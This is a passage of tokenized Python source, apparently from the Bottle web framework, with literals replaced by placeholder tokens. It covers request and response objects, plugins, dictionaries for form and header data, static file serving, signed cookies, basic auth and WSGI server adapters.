'<STR_LIT>' ] = <NUM_LIT:0> <EOL> self . set_cookie ( key , '<STR_LIT>' , ** kwargs ) <EOL> def __repr__ ( self ) : <EOL> out = '<STR_LIT>' <EOL> for name , value in self . headerlist : <EOL> out += '<STR_LIT>' % ( name . title ( ) , value . 
strip ( ) ) <EOL> return out <EOL> _lctx = threading . local ( ) <EOL> def local_property ( name ) : <EOL> return property ( lambda self : getattr ( _lctx , name ) , <EOL> lambda self , value : setattr ( _lctx , name , value ) , <EOL> lambda self : delattr ( _lctx , name ) , <EOL> '<STR_LIT>' % name ) <EOL> class LocalRequest ( BaseRequest ) : <EOL> '''<STR_LIT>''' <EOL> bind = BaseRequest . __init__ <EOL> environ = local_property ( '<STR_LIT>' ) <EOL> class LocalResponse ( BaseResponse ) : <EOL> '''<STR_LIT>''' <EOL> bind = BaseResponse . __init__ <EOL> _status_line = local_property ( '<STR_LIT>' ) <EOL> _status_code = local_property ( '<STR_LIT>' ) <EOL> _cookies = local_property ( '<STR_LIT>' ) <EOL> _headers = local_property ( '<STR_LIT>' ) <EOL> body = local_property ( '<STR_LIT>' ) <EOL> Response = LocalResponse <EOL> Request = LocalRequest <EOL> class PluginError ( BottleException ) : pass <EOL> class JSONPlugin ( object ) : <EOL> name = '<STR_LIT>' <EOL> api = <NUM_LIT:2> <EOL> def __init__ ( self , json_dumps = json_dumps ) : <EOL> self . json_dumps = json_dumps <EOL> def apply ( self , callback , context ) : <EOL> dumps = self . json_dumps <EOL> if not dumps : return callback <EOL> def wrapper ( * a , ** ka ) : <EOL> rv = callback ( * a , ** ka ) <EOL> if isinstance ( rv , dict ) : <EOL> json_response = dumps ( rv ) <EOL> response . content_type = '<STR_LIT:application/json>' <EOL> return json_response <EOL> return rv <EOL> return wrapper <EOL> class HooksPlugin ( object ) : <EOL> name = '<STR_LIT>' <EOL> api = <NUM_LIT:2> <EOL> _names = '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' <EOL> def __init__ ( self ) : <EOL> self . hooks = dict ( ( name , [ ] ) for name in self . _names ) <EOL> self . app = None <EOL> def _empty ( self ) : <EOL> return not ( self . hooks [ '<STR_LIT>' ] or self . hooks [ '<STR_LIT>' ] ) <EOL> def setup ( self , app ) : <EOL> self . app = app <EOL> def add ( self , name , func ) : <EOL> '''<STR_LIT>''' <EOL> was_empty = self . 
_empty ( ) <EOL> self . hooks . setdefault ( name , [ ] ) . append ( func ) <EOL> if self . app and was_empty and not self . _empty ( ) : self . app . reset ( ) <EOL> def remove ( self , name , func ) : <EOL> '''<STR_LIT>''' <EOL> was_empty = self . _empty ( ) <EOL> if name in self . hooks and func in self . hooks [ name ] : <EOL> self . hooks [ name ] . remove ( func ) <EOL> if self . app and not was_empty and self . _empty ( ) : self . app . reset ( ) <EOL> def trigger ( self , name , * a , ** ka ) : <EOL> '''<STR_LIT>''' <EOL> hooks = self . hooks [ name ] <EOL> if ka . pop ( '<STR_LIT>' , False ) : hooks = hooks [ : : - <NUM_LIT:1> ] <EOL> return [ hook ( * a , ** ka ) for hook in hooks ] <EOL> def apply ( self , callback , context ) : <EOL> if self . _empty ( ) : return callback <EOL> def wrapper ( * a , ** ka ) : <EOL> self . trigger ( '<STR_LIT>' ) <EOL> rv = callback ( * a , ** ka ) <EOL> self . trigger ( '<STR_LIT>' , reversed = True ) <EOL> return rv <EOL> return wrapper <EOL> class TemplatePlugin ( object ) : <EOL> '''<STR_LIT>''' <EOL> name = '<STR_LIT>' <EOL> api = <NUM_LIT:2> <EOL> def apply ( self , callback , route ) : <EOL> conf = route . config . get ( '<STR_LIT>' ) <EOL> if isinstance ( conf , ( tuple , list ) ) and len ( conf ) == <NUM_LIT:2> : <EOL> return view ( conf [ <NUM_LIT:0> ] , ** conf [ <NUM_LIT:1> ] ) ( callback ) <EOL> elif isinstance ( conf , str ) and '<STR_LIT>' in route . config : <EOL> depr ( '<STR_LIT>' ) <EOL> return view ( conf , ** route . config [ '<STR_LIT>' ] ) ( callback ) <EOL> elif isinstance ( conf , str ) : <EOL> return view ( conf ) ( callback ) <EOL> else : <EOL> return callback <EOL> class _ImportRedirect ( object ) : <EOL> def __init__ ( self , name , impmask ) : <EOL> '''<STR_LIT>''' <EOL> self . name = name <EOL> self . impmask = impmask <EOL> self . module = sys . modules . setdefault ( name , imp . new_module ( name ) ) <EOL> self . module . __dict__ . 
update ( { '<STR_LIT>' : __file__ , '<STR_LIT>' : [ ] , <EOL> '<STR_LIT>' : [ ] , '<STR_LIT>' : self } ) <EOL> sys . meta_path . append ( self ) <EOL> def find_module ( self , fullname , path = None ) : <EOL> if '<STR_LIT:.>' not in fullname : return <EOL> packname , modname = fullname . rsplit ( '<STR_LIT:.>' , <NUM_LIT:1> ) <EOL> if packname != self . name : return <EOL> return self <EOL> def load_module ( self , fullname ) : <EOL> if fullname in sys . modules : return sys . modules [ fullname ] <EOL> packname , modname = fullname . rsplit ( '<STR_LIT:.>' , <NUM_LIT:1> ) <EOL> realname = self . impmask % modname <EOL> __import__ ( realname ) <EOL> module = sys . modules [ fullname ] = sys . modules [ realname ] <EOL> setattr ( self . module , modname , module ) <EOL> module . __loader__ = self <EOL> return module <EOL> class MultiDict ( DictMixin ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , * a , ** k ) : <EOL> self . dict = dict ( ( k , [ v ] ) for ( k , v ) in dict ( * a , ** k ) . items ( ) ) <EOL> def __len__ ( self ) : return len ( self . dict ) <EOL> def __iter__ ( self ) : return iter ( self . dict ) <EOL> def __contains__ ( self , key ) : return key in self . dict <EOL> def __delitem__ ( self , key ) : del self . dict [ key ] <EOL> def __getitem__ ( self , key ) : return self . dict [ key ] [ - <NUM_LIT:1> ] <EOL> def __setitem__ ( self , key , value ) : self . append ( key , value ) <EOL> def keys ( self ) : return self . dict . keys ( ) <EOL> if py3k : <EOL> def values ( self ) : return ( v [ - <NUM_LIT:1> ] for v in self . dict . values ( ) ) <EOL> def items ( self ) : return ( ( k , v [ - <NUM_LIT:1> ] ) for k , v in self . dict . items ( ) ) <EOL> def allitems ( self ) : <EOL> return ( ( k , v ) for k , vl in self . dict . items ( ) for v in vl ) <EOL> iterkeys = keys <EOL> itervalues = values <EOL> iteritems = items <EOL> iterallitems = allitems <EOL> else : <EOL> def values ( self ) : return [ v [ - <NUM_LIT:1> ] for v in self . dict . 
values ( ) ] <EOL> def items ( self ) : return [ ( k , v [ - <NUM_LIT:1> ] ) for k , v in self . dict . items ( ) ] <EOL> def iterkeys ( self ) : return self . dict . iterkeys ( ) <EOL> def itervalues ( self ) : return ( v [ - <NUM_LIT:1> ] for v in self . dict . itervalues ( ) ) <EOL> def iteritems ( self ) : <EOL> return ( ( k , v [ - <NUM_LIT:1> ] ) for k , v in self . dict . iteritems ( ) ) <EOL> def iterallitems ( self ) : <EOL> return ( ( k , v ) for k , vl in self . dict . iteritems ( ) for v in vl ) <EOL> def allitems ( self ) : <EOL> return [ ( k , v ) for k , vl in self . dict . iteritems ( ) for v in vl ] <EOL> def get ( self , key , default = None , index = - <NUM_LIT:1> , type = None ) : <EOL> '''<STR_LIT>''' <EOL> try : <EOL> val = self . dict [ key ] [ index ] <EOL> return type ( val ) if type else val <EOL> except Exception : <EOL> pass <EOL> return default <EOL> def append ( self , key , value ) : <EOL> '''<STR_LIT>''' <EOL> self . dict . setdefault ( key , [ ] ) . append ( value ) <EOL> def replace ( self , key , value ) : <EOL> '''<STR_LIT>''' <EOL> self . dict [ key ] = [ value ] <EOL> def getall ( self , key ) : <EOL> '''<STR_LIT>''' <EOL> return self . dict . get ( key ) or [ ] <EOL> getone = get <EOL> getlist = getall <EOL> class FormsDict ( MultiDict ) : <EOL> '''<STR_LIT>''' <EOL> input_encoding = '<STR_LIT:utf8>' <EOL> recode_unicode = True <EOL> def _fix ( self , s , encoding = None ) : <EOL> if isinstance ( s , unicode ) and self . recode_unicode : <EOL> s = s . encode ( '<STR_LIT>' ) <EOL> if isinstance ( s , bytes ) : <EOL> return s . decode ( encoding or self . input_encoding ) <EOL> return s <EOL> def decode ( self , encoding = None ) : <EOL> '''<STR_LIT>''' <EOL> copy = FormsDict ( ) <EOL> enc = copy . input_encoding = encoding or self . input_encoding <EOL> copy . recode_unicode = False <EOL> for key , value in self . allitems ( ) : <EOL> copy . append ( self . _fix ( key , enc ) , self . 
_fix ( value , enc ) ) <EOL> return copy <EOL> def getunicode ( self , name , default = None , encoding = None ) : <EOL> try : <EOL> return self . _fix ( self [ name ] , encoding ) <EOL> except ( UnicodeError , KeyError ) : <EOL> return default <EOL> def __getattr__ ( self , name , default = unicode ( ) ) : <EOL> return self . getunicode ( name , default = default ) <EOL> class HeaderDict ( MultiDict ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , * a , ** ka ) : <EOL> self . dict = { } <EOL> if a or ka : self . update ( * a , ** ka ) <EOL> def __contains__ ( self , key ) : return _hkey ( key ) in self . dict <EOL> def __delitem__ ( self , key ) : del self . dict [ _hkey ( key ) ] <EOL> def __getitem__ ( self , key ) : return self . dict [ _hkey ( key ) ] [ - <NUM_LIT:1> ] <EOL> def __setitem__ ( self , key , value ) : self . dict [ _hkey ( key ) ] = [ str ( value ) ] <EOL> def append ( self , key , value ) : <EOL> self . dict . setdefault ( _hkey ( key ) , [ ] ) . append ( str ( value ) ) <EOL> def replace ( self , key , value ) : self . dict [ _hkey ( key ) ] = [ str ( value ) ] <EOL> def getall ( self , key ) : return self . dict . get ( _hkey ( key ) ) or [ ] <EOL> def get ( self , key , default = None , index = - <NUM_LIT:1> ) : <EOL> return MultiDict . get ( self , _hkey ( key ) , default , index ) <EOL> def filter ( self , names ) : <EOL> for name in [ _hkey ( n ) for n in names ] : <EOL> if name in self . dict : <EOL> del self . dict [ name ] <EOL> class WSGIHeaderDict ( DictMixin ) : <EOL> '''<STR_LIT>''' <EOL> cgikeys = ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> def __init__ ( self , environ ) : <EOL> self . environ = environ <EOL> def _ekey ( self , key ) : <EOL> '''<STR_LIT>''' <EOL> key = key . replace ( '<STR_LIT:->' , '<STR_LIT:_>' ) . upper ( ) <EOL> if key in self . cgikeys : <EOL> return key <EOL> return '<STR_LIT>' + key <EOL> def raw ( self , key , default = None ) : <EOL> '''<STR_LIT>''' <EOL> return self . environ . get ( self . 
_ekey ( key ) , default ) <EOL> def __getitem__ ( self , key ) : <EOL> return tonat ( self . environ [ self . _ekey ( key ) ] , '<STR_LIT>' ) <EOL> def __setitem__ ( self , key , value ) : <EOL> raise TypeError ( "<STR_LIT>" % self . __class__ ) <EOL> def __delitem__ ( self , key ) : <EOL> raise TypeError ( "<STR_LIT>" % self . __class__ ) <EOL> def __iter__ ( self ) : <EOL> for key in self . environ : <EOL> if key [ : <NUM_LIT:5> ] == '<STR_LIT>' : <EOL> yield key [ <NUM_LIT:5> : ] . replace ( '<STR_LIT:_>' , '<STR_LIT:->' ) . title ( ) <EOL> elif key in self . cgikeys : <EOL> yield key . replace ( '<STR_LIT:_>' , '<STR_LIT:->' ) . title ( ) <EOL> def keys ( self ) : return [ x for x in self ] <EOL> def __len__ ( self ) : return len ( self . keys ( ) ) <EOL> def __contains__ ( self , key ) : return self . _ekey ( key ) in self . environ <EOL> class ConfigDict ( dict ) : <EOL> '''<STR_LIT>''' <EOL> def __getattr__ ( self , key ) : <EOL> if key not in self and key [ <NUM_LIT:0> ] . isupper ( ) : <EOL> self [ key ] = ConfigDict ( ) <EOL> return self . get ( key ) <EOL> def __setattr__ ( self , key , value ) : <EOL> if hasattr ( dict , key ) : <EOL> raise AttributeError ( '<STR_LIT>' ) <EOL> if key in self and self [ key ] and isinstance ( self [ key ] , ConfigDict ) : <EOL> raise AttributeError ( '<STR_LIT>' ) <EOL> self [ key ] = value <EOL> def __delattr__ ( self , key ) : <EOL> if key in self : del self [ key ] <EOL> def __call__ ( self , * a , ** ka ) : <EOL> for key , value in dict ( * a , ** ka ) . items ( ) : setattr ( self , key , value ) <EOL> return self <EOL> class AppStack ( list ) : <EOL> """<STR_LIT>""" <EOL> def __call__ ( self ) : <EOL> """<STR_LIT>""" <EOL> return self [ - <NUM_LIT:1> ] <EOL> def push ( self , value = None ) : <EOL> """<STR_LIT>""" <EOL> if not isinstance ( value , Bottle ) : <EOL> value = Bottle ( ) <EOL> self . 
append ( value ) <EOL> return value <EOL> class WSGIFileWrapper ( object ) : <EOL> def __init__ ( self , fp , buffer_size = <NUM_LIT> * <NUM_LIT:64> ) : <EOL> self . fp , self . buffer_size = fp , buffer_size <EOL> for attr in ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) : <EOL> if hasattr ( fp , attr ) : setattr ( self , attr , getattr ( fp , attr ) ) <EOL> def __iter__ ( self ) : <EOL> buff , read = self . buffer_size , self . read <EOL> while True : <EOL> part = read ( buff ) <EOL> if not part : return <EOL> yield part <EOL> class ResourceManager ( object ) : <EOL> '''<STR_LIT>''' <EOL> def __init__ ( self , base = '<STR_LIT>' , opener = open , cachemode = '<STR_LIT:all>' ) : <EOL> self . opener = open <EOL> self . base = base <EOL> self . cachemode = cachemode <EOL> self . path = [ ] <EOL> self . cache = { } <EOL> def add_path ( self , path , base = None , index = None , create = False ) : <EOL> '''<STR_LIT>''' <EOL> base = os . path . abspath ( os . path . dirname ( base or self . base ) ) <EOL> path = os . path . abspath ( os . path . join ( base , os . path . dirname ( path ) ) ) <EOL> path += os . sep <EOL> if path in self . path : <EOL> self . path . remove ( path ) <EOL> if create and not os . path . isdir ( path ) : <EOL> os . mkdirs ( path ) <EOL> if index is None : <EOL> self . path . append ( path ) <EOL> else : <EOL> self . path . insert ( index , path ) <EOL> self . cache . clear ( ) <EOL> def __iter__ ( self ) : <EOL> '''<STR_LIT>''' <EOL> search = self . path [ : ] <EOL> while search : <EOL> path = search . pop ( ) <EOL> if not os . path . isdir ( path ) : continue <EOL> for name in os . listdir ( path ) : <EOL> full = os . path . join ( path , name ) <EOL> if os . path . isdir ( full ) : search . append ( full ) <EOL> else : yield full <EOL> def lookup ( self , name ) : <EOL> '''<STR_LIT>''' <EOL> if name not in self . cache or DEBUG : <EOL> for path in self . path : <EOL> fpath = os . path . 
join ( path , name ) <EOL> if os . path . isfile ( fpath ) : <EOL> if self . cachemode in ( '<STR_LIT:all>' , '<STR_LIT>' ) : <EOL> self . cache [ name ] = fpath <EOL> return fpath <EOL> if self . cachemode == '<STR_LIT:all>' : <EOL> self . cache [ name ] = None <EOL> return self . cache [ name ] <EOL> def open ( self , name , mode = '<STR_LIT:r>' , * args , ** kwargs ) : <EOL> '''<STR_LIT>''' <EOL> fname = self . lookup ( name ) <EOL> if not fname : raise IOError ( "<STR_LIT>" % name ) <EOL> return self . opener ( name , mode = mode , * args , ** kwargs ) <EOL> def abort ( code = <NUM_LIT> , text = '<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> raise HTTPError ( code , text ) <EOL> def redirect ( url , code = None ) : <EOL> """<STR_LIT>""" <EOL> if code is None : <EOL> code = <NUM_LIT> if request . get ( '<STR_LIT>' ) == "<STR_LIT>" else <NUM_LIT> <EOL> location = urljoin ( request . url , url ) <EOL> raise HTTPResponse ( "<STR_LIT>" , status = code , header = dict ( Location = location ) ) <EOL> def _file_iter_range ( fp , offset , bytes , maxread = <NUM_LIT> * <NUM_LIT> ) : <EOL> '''<STR_LIT>''' <EOL> fp . seek ( offset ) <EOL> while bytes > <NUM_LIT:0> : <EOL> part = fp . read ( min ( bytes , maxread ) ) <EOL> if not part : break <EOL> bytes -= len ( part ) <EOL> yield part <EOL> def static_file ( filename , root , mimetype = '<STR_LIT>' , download = False ) : <EOL> """<STR_LIT>""" <EOL> root = os . path . abspath ( root ) + os . sep <EOL> filename = os . path . abspath ( os . path . join ( root , filename . strip ( '<STR_LIT>' ) ) ) <EOL> header = dict ( ) <EOL> if not filename . startswith ( root ) : <EOL> return HTTPError ( <NUM_LIT> , "<STR_LIT>" ) <EOL> if not os . path . exists ( filename ) or not os . path . isfile ( filename ) : <EOL> return HTTPError ( <NUM_LIT> , "<STR_LIT>" ) <EOL> if not os . access ( filename , os . R_OK ) : <EOL> return HTTPError ( <NUM_LIT> , "<STR_LIT>" ) <EOL> if mimetype == '<STR_LIT>' : <EOL> mimetype , encoding = mimetypes . 
guess_type ( filename ) <EOL> if mimetype : header [ '<STR_LIT:Content-Type>' ] = mimetype <EOL> if encoding : header [ '<STR_LIT>' ] = encoding <EOL> elif mimetype : <EOL> header [ '<STR_LIT:Content-Type>' ] = mimetype <EOL> if download : <EOL> download = os . path . basename ( filename if download == True else download ) <EOL> header [ '<STR_LIT>' ] = '<STR_LIT>' % download <EOL> stats = os . stat ( filename ) <EOL> header [ '<STR_LIT>' ] = clen = stats . st_size <EOL> lm = time . strftime ( "<STR_LIT>" , time . gmtime ( stats . st_mtime ) ) <EOL> header [ '<STR_LIT>' ] = lm <EOL> ims = request . environ . get ( '<STR_LIT>' ) <EOL> if ims : <EOL> ims = parse_date ( ims . split ( "<STR_LIT:;>" ) [ <NUM_LIT:0> ] . strip ( ) ) <EOL> if ims is not None and ims >= int ( stats . st_mtime ) : <EOL> header [ '<STR_LIT>' ] = time . strftime ( "<STR_LIT>" , time . gmtime ( ) ) <EOL> return HTTPResponse ( status = <NUM_LIT> , header = header ) <EOL> body = '<STR_LIT>' if request . method == '<STR_LIT>' else open ( filename , '<STR_LIT:rb>' ) <EOL> header [ "<STR_LIT>" ] = "<STR_LIT>" <EOL> ranges = request . environ . get ( '<STR_LIT>' ) <EOL> if '<STR_LIT>' in request . environ : <EOL> ranges = list ( parse_range_header ( request . environ [ '<STR_LIT>' ] , clen ) ) <EOL> if not ranges : <EOL> return HTTPError ( <NUM_LIT> , "<STR_LIT>" ) <EOL> offset , end = ranges [ <NUM_LIT:0> ] <EOL> header [ "<STR_LIT>" ] = "<STR_LIT>" % ( offset , end - <NUM_LIT:1> , clen ) <EOL> header [ "<STR_LIT>" ] = str ( end - offset ) <EOL> if body : body = _file_iter_range ( body , offset , end - offset ) <EOL> return HTTPResponse ( body , header = header , status = <NUM_LIT> ) <EOL> return HTTPResponse ( body , header = header ) <EOL> def debug ( mode = True ) : <EOL> """<STR_LIT>""" <EOL> global DEBUG <EOL> DEBUG = bool ( mode ) <EOL> def parse_date ( ims ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> ts = email . utils . parsedate_tz ( ims ) <EOL> return time . 
mktime ( ts [ : <NUM_LIT:8> ] + ( <NUM_LIT:0> , ) ) - ( ts [ <NUM_LIT:9> ] or <NUM_LIT:0> ) - time . timezone <EOL> except ( TypeError , ValueError , IndexError , OverflowError ) : <EOL> return None <EOL> def parse_auth ( header ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> method , data = header . split ( None , <NUM_LIT:1> ) <EOL> if method . lower ( ) == '<STR_LIT>' : <EOL> user , pwd = touni ( base64 . b64decode ( tob ( data ) ) ) . split ( '<STR_LIT::>' , <NUM_LIT:1> ) <EOL> return user , pwd <EOL> except ( KeyError , ValueError ) : <EOL> return None <EOL> def parse_range_header ( header , maxlen = <NUM_LIT:0> ) : <EOL> '''<STR_LIT>''' <EOL> if not header or header [ : <NUM_LIT:6> ] != '<STR_LIT>' : return <EOL> ranges = [ r . split ( '<STR_LIT:->' , <NUM_LIT:1> ) for r in header [ <NUM_LIT:6> : ] . split ( '<STR_LIT:U+002C>' ) if '<STR_LIT:->' in r ] <EOL> for start , end in ranges : <EOL> try : <EOL> if not start : <EOL> start , end = max ( <NUM_LIT:0> , maxlen - int ( end ) ) , maxlen <EOL> elif not end : <EOL> start , end = int ( start ) , maxlen <EOL> else : <EOL> start , end = int ( start ) , min ( int ( end ) + <NUM_LIT:1> , maxlen ) <EOL> if <NUM_LIT:0> <= start < end <= maxlen : <EOL> yield start , end <EOL> except ValueError : <EOL> pass <EOL> def _lscmp ( a , b ) : <EOL> '''<STR_LIT>''' <EOL> return not sum ( <NUM_LIT:0> if x == y else <NUM_LIT:1> for x , y in zip ( a , b ) ) and len ( a ) == len ( b ) <EOL> def cookie_encode ( data , key ) : <EOL> '''<STR_LIT>''' <EOL> msg = base64 . b64encode ( pickle . dumps ( data , - <NUM_LIT:1> ) ) <EOL> sig = base64 . b64encode ( hmac . new ( tob ( key ) , msg ) . digest ( ) ) <EOL> return tob ( '<STR_LIT:!>' ) + sig + tob ( '<STR_LIT:?>' ) + msg <EOL> def cookie_decode ( data , key ) : <EOL> '''<STR_LIT>''' <EOL> data = tob ( data ) <EOL> if cookie_is_encoded ( data ) : <EOL> sig , msg = data . split ( tob ( '<STR_LIT:?>' ) , <NUM_LIT:1> ) <EOL> if _lscmp ( sig [ <NUM_LIT:1> : ] , base64 . b64encode ( hmac . 
new ( tob ( key ) , msg ) . digest ( ) ) ) : <EOL> return pickle . loads ( base64 . b64decode ( msg ) ) <EOL> return None <EOL> def cookie_is_encoded ( data ) : <EOL> '''<STR_LIT>''' <EOL> return bool ( data . startswith ( tob ( '<STR_LIT:!>' ) ) and tob ( '<STR_LIT:?>' ) in data ) <EOL> def html_escape ( string ) : <EOL> '''<STR_LIT>''' <EOL> return string . replace ( '<STR_LIT:&>' , '<STR_LIT>' ) . replace ( '<STR_LIT:<>' , '<STR_LIT>' ) . replace ( '<STR_LIT:>>' , '<STR_LIT>' ) . replace ( '<STR_LIT:">' , '<STR_LIT>' ) . replace ( "<STR_LIT:'>" , '<STR_LIT>' ) <EOL> def html_quote ( string ) : <EOL> '''<STR_LIT>''' <EOL> return '<STR_LIT>' % html_escape ( string ) . replace ( '<STR_LIT:\n>' , '<STR_LIT>' ) . replace ( '<STR_LIT:\r>' , '<STR_LIT>' ) . replace ( '<STR_LIT:\t>' , '<STR_LIT>' ) <EOL> def yieldroutes ( func ) : <EOL> """<STR_LIT>""" <EOL> import inspect <EOL> path = '<STR_LIT:/>' + func . __name__ . replace ( '<STR_LIT>' , '<STR_LIT:/>' ) . lstrip ( '<STR_LIT:/>' ) <EOL> spec = inspect . getargspec ( func ) <EOL> argc = len ( spec [ <NUM_LIT:0> ] ) - len ( spec [ <NUM_LIT:3> ] or [ ] ) <EOL> path += ( '<STR_LIT>' * argc ) % tuple ( spec [ <NUM_LIT:0> ] [ : argc ] ) <EOL> yield path <EOL> for arg in spec [ <NUM_LIT:0> ] [ argc : ] : <EOL> path += '<STR_LIT>' % arg <EOL> yield path <EOL> def path_shift ( script_name , path_info , shift = <NUM_LIT:1> ) : <EOL> '''<STR_LIT>''' <EOL> if shift == <NUM_LIT:0> : return script_name , path_info <EOL> pathlist = path_info . strip ( '<STR_LIT:/>' ) . split ( '<STR_LIT:/>' ) <EOL> scriptlist = script_name . strip ( '<STR_LIT:/>' ) . 
split ( '<STR_LIT:/>' ) <EOL> if pathlist and pathlist [ <NUM_LIT:0> ] == '<STR_LIT>' : pathlist = [ ] <EOL> if scriptlist and scriptlist [ <NUM_LIT:0> ] == '<STR_LIT>' : scriptlist = [ ] <EOL> if shift > <NUM_LIT:0> and shift <= len ( pathlist ) : <EOL> moved = pathlist [ : shift ] <EOL> scriptlist = scriptlist + moved <EOL> pathlist = pathlist [ shift : ] <EOL> elif shift < <NUM_LIT:0> and shift >= - len ( scriptlist ) : <EOL> moved = scriptlist [ shift : ] <EOL> pathlist = moved + pathlist <EOL> scriptlist = scriptlist [ : shift ] <EOL> else : <EOL> empty = '<STR_LIT>' if shift < <NUM_LIT:0> else '<STR_LIT>' <EOL> raise AssertionError ( "<STR_LIT>" % empty ) <EOL> new_script_name = '<STR_LIT:/>' + '<STR_LIT:/>' . join ( scriptlist ) <EOL> new_path_info = '<STR_LIT:/>' + '<STR_LIT:/>' . join ( pathlist ) <EOL> if path_info . endswith ( '<STR_LIT:/>' ) and pathlist : new_path_info += '<STR_LIT:/>' <EOL> return new_script_name , new_path_info <EOL> def validate ( ** vkargs ) : <EOL> """<STR_LIT>""" <EOL> depr ( '<STR_LIT>' ) <EOL> def decorator ( func ) : <EOL> @ functools . wraps ( func ) <EOL> def wrapper ( * args , ** kargs ) : <EOL> for key , value in vkargs . items ( ) : <EOL> if key not in kargs : <EOL> abort ( <NUM_LIT> , '<STR_LIT>' % key ) <EOL> try : <EOL> kargs [ key ] = value ( kargs [ key ] ) <EOL> except ValueError : <EOL> abort ( <NUM_LIT> , '<STR_LIT>' % key ) <EOL> return func ( * args , ** kargs ) <EOL> return wrapper <EOL> return decorator <EOL> def auth_basic ( check , realm = "<STR_LIT>" , text = "<STR_LIT>" ) : <EOL> '''<STR_LIT>''' <EOL> def decorator ( func ) : <EOL> def wrapper ( * a , ** ka ) : <EOL> user , password = request . auth or ( None , None ) <EOL> if user is None or not check ( user , password ) : <EOL> response . 
headers [ '<STR_LIT>' ] = '<STR_LIT>' % realm <EOL> return HTTPError ( <NUM_LIT> , text ) <EOL> return func ( * a , ** ka ) <EOL> return wrapper <EOL> return decorator <EOL> def make_default_app_wrapper ( name ) : <EOL> '''<STR_LIT>''' <EOL> @ functools . wraps ( getattr ( Bottle , name ) ) <EOL> def wrapper ( * a , ** ka ) : <EOL> return getattr ( app ( ) , name ) ( * a , ** ka ) <EOL> return wrapper <EOL> route = make_default_app_wrapper ( '<STR_LIT>' ) <EOL> get = make_default_app_wrapper ( '<STR_LIT>' ) <EOL> post = make_default_app_wrapper ( '<STR_LIT>' ) <EOL> put = make_default_app_wrapper ( '<STR_LIT>' ) <EOL> delete = make_default_app_wrapper ( '<STR_LIT>' ) <EOL> error = make_default_app_wrapper ( '<STR_LIT:error>' ) <EOL> mount = make_default_app_wrapper ( '<STR_LIT>' ) <EOL> hook = make_default_app_wrapper ( '<STR_LIT>' ) <EOL> install = make_default_app_wrapper ( '<STR_LIT>' ) <EOL> uninstall = make_default_app_wrapper ( '<STR_LIT>' ) <EOL> url = make_default_app_wrapper ( '<STR_LIT>' ) <EOL> class ServerAdapter ( object ) : <EOL> quiet = False <EOL> def __init__ ( self , host = '<STR_LIT:127.0.0.1>' , port = <NUM_LIT> , ** config ) : <EOL> self . options = config <EOL> self . host = host <EOL> self . port = int ( port ) <EOL> def run ( self , handler ) : <EOL> pass <EOL> def __repr__ ( self ) : <EOL> args = '<STR_LIT:U+002CU+0020>' . join ( [ '<STR_LIT>' % ( k , repr ( v ) ) for k , v in self . options . items ( ) ] ) <EOL> return "<STR_LIT>" % ( self . __class__ . __name__ , args ) <EOL> class CGIServer ( ServerAdapter ) : <EOL> quiet = True <EOL> def run ( self , handler ) : <EOL> from wsgiref . handlers import CGIHandler <EOL> def fixed_environ ( environ , start_response ) : <EOL> environ . setdefault ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> return handler ( environ , start_response ) <EOL> CGIHandler ( ) . run ( fixed_environ ) <EOL> class FlupFCGIServer ( ServerAdapter ) : <EOL> def run ( self , handler ) : <EOL> import flup . server . 
fcgi <EOL> self . options . setdefault ( '<STR_LIT>' , ( self . host , self . port ) ) <EOL> flup . server . fcgi . WSGIServer ( handler , ** self . options ) . run ( ) <EOL> class WSGIRefServer ( ServerAdapter ) : <EOL> def run ( self , handler ) : <EOL> from wsgiref . simple_server import make_server , WSGIRequestHandler <EOL> if self . quiet : <EOL> class QuietHandler ( WSGIRequestHandler ) : <EOL> def log_request ( * args , ** kw ) : pass <EOL> self . options [ '<STR_LIT>' ] = QuietHandler <EOL> srv = make_server ( self . host , self . port , handler , ** self . options ) <EOL> srv . serve_forever ( ) <EOL> class CherryPyServer ( ServerAdapter ) : <EOL> def run ( self , handler ) : <EOL> from cherrypy import wsgiserver <EOL> server = wsgiserver . CherryPyWSGIServer ( ( self . host , self . port ) , handler ) <EOL> try : <EOL> server . start ( ) <EOL> finally : <EOL> server . stop ( ) <EOL> class WaitressServer ( ServerAdapter ) : <EOL> def run ( self , handler ) : <EOL> from waitress import serve <EOL> serve ( handler , host = self . host , port = self . port ) <EOL> class PasteServer ( ServerAdapter ) : <EOL> def run ( self , handler ) : <EOL> from paste import httpserver <EOL> if not self . quiet : <EOL> from paste . translogger import TransLogger <EOL> handler = TransLogger ( handler ) <EOL> httpserver . serve ( handler , host = self . host , port = str ( self . port ) , <EOL> ** self . options ) <EOL> class MeinheldServer ( ServerAdapter ) : <EOL> def run ( self , handler ) : <EOL> from meinheld import server <EOL> server . listen ( ( self . host , self . port ) ) <EOL> server . run ( handler ) <EOL> class FapwsServer ( ServerAdapter ) : <EOL> """<STR_LIT>""" <EOL> def run ( self , handler ) : <EOL> import fapws . _evwsgi as evwsgi <EOL> from fapws import base , config <EOL> port = self . port <EOL> if float ( config . SERVER_IDENT [ - <NUM_LIT:2> : ] ) > <NUM_LIT> : <EOL> port = str ( port ) <EOL> evwsgi . start ( self . 
host , port ) <EOL> if '<STR_LIT>' in os . environ and not self . quiet : <EOL> _stderr ( "<STR_LIT>" ) <EOL> _stderr ( "<STR_LIT>" ) <EOL> evwsgi . set_base_module ( base ) <EOL> def app ( environ , start_response ) : <EOL> environ [ '<STR_LIT>' ] = False <EOL> return handler ( environ , start_response ) <EOL> evwsgi . wsgi_cb ( ( '<STR_LIT>' , app ) ) <EOL> evwsgi . run ( ) <EOL> class TornadoServer ( ServerAdapter ) : <EOL> """<STR_LIT>""" <EOL> def run ( self , handler ) : <EOL> import tornado . wsgi , tornado . httpserver , tornado . ioloop <EOL> container = tornado . wsgi . WSGIContainer ( handler ) <EOL> server = tornado . httpserver . HTTPServer ( container ) <EOL> server . listen ( port = self . port ) <EOL> tornado . ioloop . IOLoop . instance ( ) . start ( ) <EOL> class AppEngineServer ( ServerAdapter ) : <EOL> """<STR_LIT>""" <EOL> quiet = True <EOL> def run ( self , handler ) : <EOL> from google . appengine . ext . webapp import util <EOL> module = 